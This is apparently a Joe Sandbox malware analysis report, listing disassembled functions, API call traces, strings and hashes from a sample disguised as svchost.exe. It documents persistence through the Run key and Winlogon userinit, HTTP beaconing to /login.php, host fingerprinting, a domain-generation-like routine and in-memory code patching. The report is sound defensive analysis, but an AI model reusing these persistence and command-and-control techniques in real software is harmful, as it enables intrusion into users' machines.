                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA7F62
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02CA7F6C
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02CA7F8D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02CA7FBD
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02CA7FC7
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CA7FD1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA7FD7
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02CA800D
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02CA801C
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02CA8039
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CA8044
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02CA8067
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                              • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 2213373080-1283825033
                                                                                                                                                                                                              • Opcode ID: 8b096dc6d6f4fb92ef948104a2c3e840d927237885b6244feba09df9b7b5946b
                                                                                                                                                                                                              • Instruction ID: cab2e4b4ad96689a7572d4f5bdbc3d6dcfdc20b11c5487e76b60d8e133ce193f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b096dc6d6f4fb92ef948104a2c3e840d927237885b6244feba09df9b7b5946b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A571CA71A40206FFEB208B649C99FBEB769FF84748F504654F941EB180D7B19A05C7A0
                                                                                                                                                                                                              Function 02C96690 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 260memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 565 2c96690-2c966d0 memset call 2ca4ab0 568 2c966ee-2c966fe call 2c974a0 565->568 569 2c966d2-2c966e1 call 2ca4ab0 565->569 574 2c96949-2c96952 PathFileExistsA 568->574 575 2c96704-2c9671b calloc * 2 568->575 573 2c966e6-2c966e8 569->573 573->568 573->574 578 2c96968-2c9696f 574->578 579 2c96954-2c96956 574->579 576 2c9671d-2c9671f exit 575->576 577 2c96725-2c96730 calloc 575->577 576->577 580 2c9673a-2c96758 calloc 577->580 581 2c96732-2c96734 exit 577->581 579->578 582 2c96958-2c96962 SetFileAttributesA DeleteFileA 579->582 583 2c9675a-2c9675c exit 580->583 584 2c96762-2c9676d calloc 580->584 581->580 582->578 583->584 585 2c9676f-2c96771 exit 584->585 586 2c96777-2c9679d calloc 584->586 585->586 587 2c9679f-2c967a1 exit 586->587 588 2c967a7-2c967b2 calloc 586->588 587->588 589 2c967bc-2c967e2 calloc 588->589 590 2c967b4-2c967b6 exit 588->590 591 2c967ec-2c967fb calloc 589->591 592 2c967e4-2c967e6 exit 589->592 590->589 593 2c967fd-2c967ff exit 591->593 594 2c96805-2c96856 call 2c91990 * 3 call 2c91a00 591->594 592->591 593->594 603 2c96858-2c96860 594->603 603->603 604 2c96862-2c9687b _strrev 603->604 605 2c96880-2c96885 604->605 605->605 606 2c96887-2c96896 605->606 607 2c96898-2c9689c 606->607 608 2c968ac-2c968ae 606->608 609 2c9689e-2c968aa 607->609 610 2c968b0-2c968b8 607->610 608->610 611 2c968f3 608->611 609->607 609->608 612 2c968eb-2c968f1 610->612 613 2c968ba-2c968bd 610->613 614 2c968f5-2c96937 call 2c91840 * 4 GetProcessHeap HeapValidate 611->614 612->614 613->611 615 2c968bf-2c968c9 613->615 628 2c96939-2c9693f GetProcessHeap RtlFreeHeap 614->628 629 2c96945-2c96948 614->629 615->612 617 2c968cb-2c968ce 615->617 617->611 619 2c968d0-2c968da 617->619 619->612 621 2c968dc-2c968df 619->621 621->611 624 2c968e1-2c968e9 621->624 624->612 628->629 629->574
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C966B0
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: memset.MSVCRT ref: 02CA4AED
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02CA4B27
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02CA4B2E
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: memset.MSVCRT ref: 02CA4B3E
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: memcpy.MSVCRT ref: 02CA4B5D
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02CA4BC2
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C9670F
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C9671F
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C96729
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C96734
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C9674F
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C9675C
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C96766
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C96771
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C96794
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C967A1
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C967AB
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C967B6
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C967D9
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C967E6
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02C967F0
                                                                                                                                                                                                              • exit.MSVCRT ref: 02C967FF
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02CA4BE1
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02CA4C19
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02CA4C4A
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02CA4C5E
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: _snprintf.MSVCRT ref: 02CA4C7C
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02CA4C94
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02CA4CAA
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02CA4CCD
                                                                                                                                                                                                                • Part of subcall function 02CA4AB0: CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02CA4D05
                                                                                                                                                                                                              • _strrev.MSVCRT ref: 02C96869
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001,?), ref: 02C9692C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9692F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C9693C
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 02C9693F
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?,00000000,00000001,00000000,/login.php,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02C9694A
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,?), ref: 02C9695B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,?), ref: 02C96962
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • 10001, xrefs: 02C9682A
                                                                                                                                                                                                              • /login.php, xrefs: 02C966C1, 02C966D8
                                                                                                                                                                                                              • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02C9680D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexit$HeapHttp$Request$File$HeadersProcessmemset$InternetOpen$AllocAttributesConnectCreateDeleteExistsFreeInfoPathQuerySendValidate_snprintf_strrevmemcpy
                                                                                                                                                                                                              • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
                                                                                                                                                                                                              • API String ID: 1958765476-2761129557
                                                                                                                                                                                                              • Opcode ID: cb99f67e1d6b3e0f97f51f0e3e0f652f7327f233183dd8a788d632456c154623
                                                                                                                                                                                                              • Instruction ID: dbaa6c095aabebea9021136f53e4ad4234eaf1c01e3d949f44d90f68ca0c00cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb99f67e1d6b3e0f97f51f0e3e0f652f7327f233183dd8a788d632456c154623
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B18126B0A80311AFEF109F748C49BAA7FACAF41745F144559EA49EB2C1D7F29644CBE0
                                                                                                                                                                                                              Function 02C930E0 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 185memoryregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 630 2c930e0-2c9311a memset call 2cb4ff0 633 2c93120-2c9312d call 2cb50f0 630->633 634 2c932d7-2c932de 630->634 637 2c93133-2c93170 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA 633->637 638 2c93285-2c9329b GetProcessHeap HeapValidate 633->638 639 2c93179-2c93196 RegOpenKeyExA 637->639 640 2c93172 637->640 641 2c9329d-2c932a6 GetProcessHeap HeapFree 638->641 642 2c932ac-2c932b1 638->642 643 2c93198-2c931b9 RegQueryValueExA RegCloseKey 639->643 644 2c931bf-2c931c4 639->644 640->639 641->642 645 2c932ce-2c932d6 642->645 646 2c932b3-2c932bd GetProcessHeap HeapValidate 642->646 643->644 648 2c931c9-2c931d5 644->648 649 2c931c6 644->649 646->645 647 2c932bf-2c932c8 GetProcessHeap HeapFree 646->647 647->645 650 2c931de-2c931e1 CharUpperA 648->650 651 2c931d7-2c931dc 648->651 649->648 652 2c931e3-2c9320d CharUpperA _snprintf 650->652 651->652 653 2c93210-2c93215 652->653 653->653 654 2c93217-2c93219 653->654 655 2c9321b 654->655 656 2c9327d-2c93280 654->656 657 2c93220-2c93225 655->657 656->638 658 2c93226-2c9322c 657->658 658->658 659 2c9322e-2c9323d 658->659 660 2c93240-2c93245 659->660 660->660 661 2c93247-2c9326d _snprintf 660->661 662 2c93270-2c93275 661->662 662->662 663 2c93277-2c9327b 662->663 663->656 663->657
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C93106
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: memset.MSVCRT ref: 02CB5023
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02CB5032
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02CB5039
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: memset.MSVCRT ref: 02CB5051
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02CB5068
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02CB506E
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02CB508F
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB50B6
                                                                                                                                                                                                                • Part of subcall function 02CB4FF0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB50CA
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: memset.MSVCRT ref: 02CB5124
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02CB5133
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02CB513A
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: memset.MSVCRT ref: 02CB5152
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02CB5169
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02CB516F
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02CB5190
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB51B7
                                                                                                                                                                                                                • Part of subcall function 02CB50F0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB51CB
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,74DF2F70,00000000), ref: 02C93144
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,?,74DF2F70,00000000), ref: 02C93151
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,74DF2F70,00000000), ref: 02C93168
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,74DF2F70,00000000), ref: 02C9318E
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,74DF2F70,00000000), ref: 02C931AF
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,74DF2F70,00000000), ref: 02C931B9
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,74DF2F70,00000000), ref: 02C931DF
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,?,74DF2F70,00000000), ref: 02C931E8
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C93201
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C9325F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,74DF2F70,00000000), ref: 02C9328E
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,74DF2F70,00000000), ref: 02C93297
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02CA6E07,?,?,74DF2F70,00000000), ref: 02C932A3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,74DF2F70,00000000), ref: 02C932A6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,74DF2F70,00000000), ref: 02C932B6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,74DF2F70,00000000), ref: 02C932B9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,74DF2F70,00000000), ref: 02C932C5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,74DF2F70,00000000), ref: 02C932C8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                              • String ID: %02X$%53%59%53%54%45%4D%21%38%31%38%32%32%35%21%43%31%42%34%45%39%44%34$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!818225!C1B4E9D4$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                              • API String ID: 3299431409-3831095534
                                                                                                                                                                                                              • Opcode ID: e79200394a6f6f310e56426565b5493440f4e3cc5ea813c2d8c33fe5f1157f84
                                                                                                                                                                                                              • Instruction ID: 4bc00afb323ebca5117247dff5371b5399d75f8db6e08ae458ea28579766588b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e79200394a6f6f310e56426565b5493440f4e3cc5ea813c2d8c33fe5f1157f84
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12510671E40285ABEB209BA99C48FABB7BCEF84740F444595FA05EB141D771DA00CBA0
                                                                                                                                                                                                              Function 02CAA350 Relevance: 37.7, APIs: 25, Instructions: 190threadmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02CAA376
                                                                                                                                                                                                              • GetThreadPriority.KERNEL32(00000000,?,02CAA660,00000000,00000000,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA37D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CAA386
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(02CAA660,00000008,00000040,?,?,02CAA660,00000000,00000000,?,?,?,?,?,?,02CA98DA,00000000), ref: 02CAA3A7
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02CAA3C6
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02CAA3E2
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02CAA3F8
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02CAA406
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02CAA411
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02CAA424
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02CAA435
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02CAA444
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02CAA453
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02CAA462
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000006,?), ref: 02CAA46A
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02CAA47D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02CAA48E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02CAA49D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02CAA4A9
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02CAA4B3
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02CAA4BB
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 02CAA4C2
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02CAA4FE
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 02CAA505
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(02CAA660,00000008,00000000,02CAA660), ref: 02CAA51F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2984368831-0
                                                                                                                                                                                                              • Opcode ID: d7b4de2936b6cb39d9e6b1e370b0d14448c962982f2d1e6c90b2dc13436fc6b0
                                                                                                                                                                                                              • Instruction ID: 3fdb9710a128f93b285790e78493c04b53c7fbc6e274aa7617dd299a78ac9951
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7b4de2936b6cb39d9e6b1e370b0d14448c962982f2d1e6c90b2dc13436fc6b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6518F71941229AFE710AF74CC46FAE77BCFF49320F154928F982E7180DA789951CBA0
                                                                                                                                                                                                              Function 004021D0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 842 4021d0-40231e CreateFileA 843 402350-402355 842->843 844 402320-40234a DeviceIoControl CloseHandle 842->844 844->843
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                              • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                              • API String ID: 33631002-3172865025
                                                                                                                                                                                                              • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                              Function 02C963F0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 204stringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 845 2c963f0-2c964b9 memset * 3 846 2c964c0-2c964ca 845->846 846->846 847 2c964cc-2c964e3 846->847 848 2c964f0-2c96518 strtol 847->848 848->848 849 2c9651a-2c96524 848->849 850 2c96530-2c9653e 849->850 850->850 851 2c96540 850->851 852 2c96542-2c96551 851->852 853 2c96553 852->853 854 2c96555-2c9655c 852->854 853->854 854->852 855 2c9655e-2c96593 call 2ca8160 strstr 854->855 858 2c9659e-2c965af strstr 855->858 859 2c96595-2c9659d 855->859 858->859 860 2c965b1-2c965c3 strtol 858->860 860->859 861 2c965c5-2c965cc 860->861 862 2c9662f-2c96647 GetProcessHeap RtlAllocateHeap 861->862 863 2c965ce-2c965de 861->863 864 2c96649-2c96682 memset * 2 _snprintf 862->864 865 2c96685-2c9668d 862->865 866 2c965e3-2c965f7 863->866 864->865 867 2c965f9-2c965fd 866->867 868 2c965fe 866->868 867->868 869 2c96600-2c96611 868->869 870 2c96613-2c96620 868->870 871 2c96624-2c9662d 869->871 870->871 871->862 872 2c965e0 871->872 872->866
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$strstrstrtol
                                                                                                                                                                                                              • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                              • API String ID: 600650289-3097137778
                                                                                                                                                                                                              • Opcode ID: 9f1eb89a37837300fa6eae9db08bf0dd2e19d5fb714d522c12137b67792f263d
                                                                                                                                                                                                              • Instruction ID: 8cb4705055a10203572eb02257d2321f88cbe0c68bd09fc5a9ab7f37b16f863a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f1eb89a37837300fa6eae9db08bf0dd2e19d5fb714d522c12137b67792f263d
